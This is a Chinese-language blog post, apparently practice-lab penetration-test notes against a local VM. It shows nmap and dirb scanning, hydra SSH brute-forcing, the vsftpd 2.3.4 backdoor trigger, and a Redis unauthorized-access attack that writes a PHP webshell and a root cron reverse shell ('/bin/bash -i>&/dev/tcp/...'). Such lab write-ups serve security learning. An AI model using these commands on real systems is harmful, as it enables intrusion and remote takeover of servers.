靶场测试

shiro框架,登录框

介绍项目;

以网信办为例,代表xx公司现场值守xx设备,研判告警流量,根据情况应急响应

具体干了什么活;

直接内网访问安全设备,看告警,上报情况,写日报。

渗透测试

信息收集

指纹信息

后端使用的是PHP语言

image-20250905143215955

nmap端口扫描

nmap -p- 192.168.142.147
# 开放了 21 端口、22 端口、 80 端口、 3306 端口、 6379 端口

image-20250905142611306

目录扫描

dirb http://192.168.142.147

image-20250905144432442

image-20250905144617167

image-20250905163332586

攻击测试

泄露源码,www.zip

http://192.168.142.147/www.zip

image-20250905145323669

目录遍历-1

http://192.168.142.147/dist/

image-20250905145732289

目录遍历-2

http://192.168.142.147/css/

image-20250905145914803

弱密码

发现登录窗口尝试进行登录测试

image-20250905150151721

进行弱密码爆破

ssh弱密码

hydra -L user.txt -P password.txt -t 32 -vV 192.168.142.147 ssh

image-20250905171150432

SSH软连接

ssh root@192.168.142.147 -p 22 
# root 用户,密码 admin@qq.com

image-20250905161308606

笑脸漏洞

21端口使用vsftpd的2.3.4版本存在笑脸漏洞

image-20250905153619447

根据服务器打开的21端口

nc 192.168.142.147
# 输入用户名带有 :)
# 例如 user a:)
# 密码 pass 123456 随便输入

image-20250905152221122

然后查看靶机的6200端口管是否开放

nmap -p 6200 192.168.142.147

image-20250905152408246

然后使用nc连接6200端口,查看用户是root用户

nc 192.168.142.147 6200

image-20250905152528039

Redis未授权

下载redis客户端

wget http://download.redis.io/releases/redis-4.0.10.tar.gz
tar -xzf redis-4.0.10.tar.gz
cd redis-4.0.10
make
make install

image-20250905154629489

进行redis访问

redis-cli -h 192.168.142.147

image-20250905154456449

尝试写入webshell

192.168.142.147:6379> config set dir /var/www/html
OK
192.168.142.147:6379> config set dbfilename info.php
OK
192.168.142.147:6379> set webshell "<?php phpinfo(); ?>"
OK
192.168.142.147:6379> save
OK

image-20250905155145078

测试webshell

image-20250905155235113

写反弹shell

192.168.142.147:6379> set xxx "\n* * * * * /bin/bash -i>&/dev/tcp/192.168.142.145/6666 0>&1\n"
OK
192.168.142.147:6379> config set dir /var/spool/cron
OK
192.168.142.147:6379> config set dbfilename root
OK
192.168.142.147:6379> save

image-20250905160822890

Author: wickt42
Link: http://example.com/2025/09/05/靶场测试/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.